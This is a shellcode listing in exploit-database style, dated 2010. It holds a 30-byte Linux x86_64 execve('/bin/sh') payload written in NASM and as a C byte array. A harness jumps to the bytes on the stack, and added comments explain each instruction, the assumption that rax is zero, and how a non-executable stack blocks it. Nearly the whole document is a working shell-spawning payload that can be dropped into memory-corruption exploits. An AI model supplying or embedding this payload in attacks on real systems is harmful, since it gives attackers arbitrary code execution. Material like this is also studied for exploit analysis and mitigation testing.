
# Title : Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode
# Published : 2010-04-25
# Author : zbt


# Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode
# Date: 2010-04-26
# Author: zbt
# Tested on: x86_64 Debian GNU/Linux

/*
	; execve("/bin/sh", ["/bin/sh"], NULL)

	section .text
		    global _start

	_start:
		    xor     rdx, rdx
		    mov     qword rbx, '//bin/sh'
		    shr     rbx, 0x8
		    push    rbx
		    mov     rdi, rsp
		    push    rax
		    push    rdi
		    mov     rsi, rsp
		    mov     al, 0x3b
		    syscall
*/

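/*
 * Test harness: places the 30-byte execve("/bin/sh") payload (the NASM
 * listing above) in a stack buffer and jumps to it.
 *
 * What the bytes do, in order: zero rdx (envp = NULL); load the 8 bytes
 * "//bin/sh" into rbx and shift right by 8 so the high byte becomes zero
 * and rbx holds "/bin/sh\0"; push it and take rdi = rsp (pathname); push
 * rax and rdi and take rsi = rsp (argv = {pathname, NULL}); set al = 0x3b
 * (execve on x86_64) and issue syscall.
 *
 * Points worth knowing when reading or analysing this sample:
 *   - rax is never zeroed: the NULL argv terminator (push rax) and the
 *     upper bits of the syscall number (mov al) both assume rax == 0 on
 *     entry. Nothing in the 30 bytes guarantees that.
 *   - `shellcode` lives on the stack, so calling it needs an executable
 *     stack. With the default non-executable stack (NX / W^X) the call
 *     faults instead of running, which is the mitigation working as
 *     intended.
 *   - execve does not return on success; `return 0` is reached only if
 *     the call comes back.
 *
 * The "\x" escape prefixes were lost in extraction; they are restored
 * here so each line is one instruction, matching the comment next to it.
 */
int main(void)
{
	char shellcode[] =
	"\x48\x31\xd2"                                  // xor    %rdx, %rdx
	"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov    $0x68732f6e69622f2f, %rbx
	"\x48\xc1\xeb\x08"                              // shr    $0x8, %rbx
	"\x53"                                          // push   %rbx
	"\x48\x89\xe7"                                  // mov    %rsp, %rdi
	"\x50"                                          // push   %rax
	"\x57"                                          // push   %rdi
	"\x48\x89\xe6"                                  // mov    %rsp, %rsi
	"\xb0\x3b"                                      // mov    $0x3b, %al
	"\x0f\x05";                                     // syscall

	/* Treat the buffer as a no-argument function and call it. */
	(*(void (*)(void)) shellcode)();

	return 0;
}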